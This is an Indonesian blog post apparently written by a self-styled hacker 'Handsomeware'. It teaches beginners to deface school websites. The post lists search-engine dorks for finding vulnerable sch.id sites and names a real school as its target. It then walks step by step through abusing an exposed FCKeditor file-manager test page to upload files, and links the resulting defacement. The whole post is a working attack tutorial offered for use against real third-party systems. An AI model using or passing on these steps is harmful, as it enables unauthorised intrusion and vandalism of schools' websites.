DEFACE DENGAN FILE UPLOAD INI SANGAT MUDAH DAN DIPERUNTUKAN UNTUK NEWBIE ATAU PEMULA YANG INGIN MENDEFACE WEBSITE SEKOLAH(SCH.ID)
BAHAN:
1. Notepad (Script Deface)
2.Dork
Langkah kerja:
1. Berikut Dork yang akan kita cari
Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
saya memilih dork inurl:/html/siswa.php? . Nanti akan muncul web untuk ditebas.Pilih salah satu webnya
2. Jika anda sudah memilah. Target saya Seperti Ini Oke langsung saja
http://smaplusbanyuasin.sch.id//html/siswa.php?id=prestasi
3. Exploit dengan /editor/filemanager/connectors/test.html
Contoh : http://smaplusbanyuasin.sch.id/editor/filemanager/connectors/test.html lalu Enter
4. Tampilannya akan berubah Akan tampil fck editor "Kalo tidak tampil/error cari site yang lain"
5. Pada kolom Connector ubahlah *ASP menjadi *PHP, terus pada kolom Resource Type ganti menjadi File
6. Upload file anda yang berbentuk .txt kalo berhasil ada tanda File Uploaded With No Error
7. Setelah file ter-upload. Kita cari file kita dengan exploit /userfiles/file/namafileanda.txt
dan ini hasil deface nya http://smaplusbanyuasin.sch.id//userfiles/image/ilham17%281%29.jpg
sekian dan semoga tutor diatas bisa membantu belajar cara merubah tampilan web atau biasa disebut deface sekian artikel dari saya
Saya adalah Handsomeware , inisial saya di dunia blogging dan dunia cyber.
ConversionConversion EmoticonEmoticon